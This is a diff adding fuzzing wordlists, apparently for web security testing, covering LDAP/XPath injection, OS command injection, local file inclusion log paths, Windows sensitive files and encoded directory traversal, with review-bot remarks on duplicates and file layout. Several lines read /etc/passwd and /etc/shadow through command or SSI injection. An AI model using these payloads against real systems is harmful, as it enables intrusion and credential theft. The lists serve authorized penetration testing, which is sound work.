0x7fffffff
|
||||
0x80000000
|
||||
0xfffffffe
|
||||
0xffffffff
|
||||
0x10000
|
||||
0x100000
|
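Review bot: The header comment gives only the source ("from jbrofuzz") and not the integer width the values target; every boundary listed (`0x7fffffff`, `0x80000000`, `0xffffffff`) is a 32-bit edge, so the comment should say so. The last two entries, `0x10000` and `0x100000`, break the otherwise ascending order and would read more naturally after `0x1000`.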
26
attack-payloads/ldap/ldap-injection.txt
Normal file
|
@ -0,0 +1,26 @@
|
|||
!
|
||||
%21
|
||||
%26
|
||||
%28
|
||||
%29
|
||||
%2A%28%7C%28mail%3D%2A%29%29
|
||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||
%2A%7C
|
||||
%7C
|
||||
&
|
||||
(
|
||||
)
|
||||
*(|(mail=*))
|
||||
*(|(objectclass=*))
|
||||
*/*
|
||||
*|
|
||||
/
|
||||
//
|
||||
//*
|
||||
@*
|
||||
x' or name()='username' or 'x'='y
|
||||
|
|
||||
*()|&'
|
||||
admin*
|
||||
admin*)((|userpassword=*)
|
||||
*)(uid=*))(|(uid=*
|
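Review bot: Several entries in this file appear to be XPath rather than LDAP filter syntax, most clearly `x' or name()='username' or 'x'='y`, and also `//`, `//*`, `@*` and `*/*`; move them to a separate XPath list or add a comment explaining why they belong under ldap/. The file also has no header comment giving source, date or license, unlike the other lists in this commit, and contains an empty entry before `*()|&'`.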
31
attack-payloads/lfi/common-unix-httpd-log-locations.txt
Normal file
31
attack-payloads/lfi/common-unix-httpd-log-locations.txt
Normal file
|
@ -0,0 +1,31 @@
|
|||
# based on list by Joseph Giron http://www.wtfchan.org/~evil1/Web-Shells-rev2.pdf
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/etc/httpd/logs/acces_log
|
||||
/etc/httpd/logs/acces.log
|
||||
/etc/httpd/logs/error_log
|
||||
/etc/httpd/logs/error.log
|
||||
/var/www/logs/access_log
|
||||
/var/www/logs/access.log
|
||||
/usr/local/apache/logs/access_log
|
||||
/usr/local/apache/logs/access.log
|
||||
/var/log/apache/access_log
|
||||
/var/log/apache2/access_log
|
||||
/var/log/apache/access.log
|
||||
/var/log/apache2/access.log
|
||||
/var/log/access_log
|
||||
/var/log/access.log
|
||||
/var/www/logs/error_log
|
||||
/var/www/logs/error.log
|
||||
/usr/local/apache/logs/error_log
|
||||
/usr/local/apache/logs/error.log
|
||||
/var/log/apache/error_log
|
||||
/var/log/apache2/error_log
|
||||
/var/log/apache/error.log
|
||||
/var/log/apache2/error.log
|
||||
/var/log/error_log
|
||||
/var/log/error.log
|
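Review bot: `/apache/logs/error.log` and `/apache/logs/access.log` each appear three times at the top of the list; deduplicate them, or restore whatever prefix originally distinguished the three pairs. `/etc/httpd/logs/acces_log` and `/etc/httpd/logs/acces.log` spell "access" with one s, unlike every other access-log path in the file; confirm against the cited source whether that is intended.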
3
attack-payloads/lfi/readme.txt
Normal file
|
@ -0,0 +1,3 @@
|
|||
other tools:
|
||||
|
||||
fimap http://code.google.com/p/fimap/
|
69
attack-payloads/os-cmd-execution/command-execution-unix.txt
Normal file
|
@ -0,0 +1,69 @@
|
|||
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
|
||||
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
/index.html|id|
|
||||
;id;
|
||||
;id
|
||||
;netstat -a;
|
||||
;id;
|
||||
|id
|
||||
|/usr/bin/id
|
||||
|id|
|
||||
|/usr/bin/id|
|
||||
||/usr/bin/id|
|
||||
|id;
|
||||
||/usr/bin/id;
|
||||
;id|
|
||||
;|/usr/bin/id|
|
||||
\n/bin/ls -al\n
|
||||
\n/usr/bin/id\n
|
||||
\nid\n
|
||||
\n/usr/bin/id;
|
||||
\nid;
|
||||
\n/usr/bin/id|
|
||||
\nid|
|
||||
;/usr/bin/id\n
|
||||
;id\n
|
||||
|usr/bin/id\n
|
||||
|nid\n
|
||||
`id`
|
||||
`/usr/bin/id`
|
||||
a);id
|
||||
a;id
|
||||
a);id;
|
||||
a;id;
|
||||
a);id|
|
||||
a;id|
|
||||
a)|id
|
||||
a|id
|
||||
a)|id;
|
||||
a|id
|
||||
|/bin/ls -al
|
||||
a);/usr/bin/id
|
||||
a;/usr/bin/id
|
||||
a);/usr/bin/id;
|
||||
a;/usr/bin/id;
|
||||
a);/usr/bin/id|
|
||||
a;/usr/bin/id|
|
||||
a)|/usr/bin/id
|
||||
a|/usr/bin/id
|
||||
a)|/usr/bin/id;
|
||||
a|/usr/bin/id
|
||||
;system('cat%20/etc/passwd')
|
||||
;system('id')
|
||||
;system('/usr/bin/id')
|
||||
%0Acat%20/etc/passwd
|
||||
%0A/usr/bin/id
|
||||
%0Aid
|
||||
%0A/usr/bin/id%0A
|
||||
%0Aid%0A
|
||||
& ping -i 30 127.0.0.1 &
|
||||
& ping -n 30 127.0.0.1 &
|
||||
%0a ping -i 30 127.0.0.1 %0a
|
||||
`ping 127.0.0.1`
|
||||
| id
|
||||
& id
|
||||
; id
|
||||
%0a id %0a
|
||||
`id`
|
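Review bot: The list contains exact duplicates that should be removed: `;id;`, `<!--#exec%20cmd="/usr/bin/id;-->`, `a|id`, `a|/usr/bin/id` and `` `id` `` each appear twice. The file also has no header comment stating source, date or license, which commands-unix.txt and the other lists in this commit do provide.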
11
attack-payloads/os-cmd-execution/commands-unix.txt
Normal file
|
@ -0,0 +1,11 @@
|
|||
# list of potentially useful unix commands to fuzz inside an os command execution bug
|
||||
uname -n -s
|
||||
whoami
|
||||
pwd
|
||||
last
|
||||
cat /etc/passwd
|
||||
ls -la /tmp
|
||||
ls -la /home
|
||||
ping -i 30 127.0.0.1
|
||||
ping 127.0.0.1
|
||||
ping -n 30
|
4
attack-payloads/os-cmd-execution/commands-windows.txt
Normal file
|
@ -0,0 +1,4 @@
|
|||
# list of potentially useful dos commands to fuzz inside an os command execution bug
|
||||
ver
|
||||
chdir
|
||||
echo %USERNAME%
|
|
@ -0,0 +1,8 @@
|
|||
# single directory traversals that have caused showcode or command exec issues in the past
|
||||
# GET /path/*payload*relative/path/to/target/file/
|
||||
..%255c
|
||||
.%5c../..%5c
|
||||
/..%c0%9v../
|
||||
/..%c0%af../
|
||||
/..%255c..%255c
|
||||
|
7
attack-payloads/os-dir-indexing/directory-indexing.txt
Normal file
|
@ -0,0 +1,7 @@
|
|||
;dir
|
||||
`dir`
|
||||
|dir|
|
||||
|dir
|
||||
/%3f.jsp
|
||||
?M=D
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
|
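Review bot: directory-indexing.txt has no leading `#` comment, while commands-unix.txt and commands-windows.txt in the same commit each open with one describing the list. The four `dir` entries at the top of the hunk are command-separator strings rather than directory-index requests, so a header should state why they are filed under os-dir-indexing, or they should move next to the os-cmd-execution lists.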
@ -0,0 +1,6 @@
|
|||
C:/inetpub/wwwroot/global.asa
|
||||
C:\inetpub\wwwroot\global.asa
|
||||
C:/boot.ini
|
||||
C:\boot.ini
|
||||
D:\inetpub\wwwroot\global.asa
|
||||
D:/inetpub/wwwroot/global.asa
|
|
@ -0,0 +1,882 @@
|
|||
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni
|
||||
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a
|
||||
# separate fuzzfile for more flexibiity
|
||||
/../{FILE}
|
||||
/../../{FILE}
|
||||
/../../../{FILE}
|
||||
/../../../../{FILE}
|
||||
/../../../../../{FILE}
|
||||
/../../../../../../{FILE}
|
||||
/../../../../../../../{FILE}
|
||||
/../../../../../../../../{FILE}
|
||||
/..%2f{FILE}
|
||||
/..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/..%252f{FILE}
|
||||
/..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\{FILE}
|
||||
/..\..\..\{FILE}
|
||||
/..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\..\{FILE}
|
||||
/..%255c{FILE}
|
||||
/..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
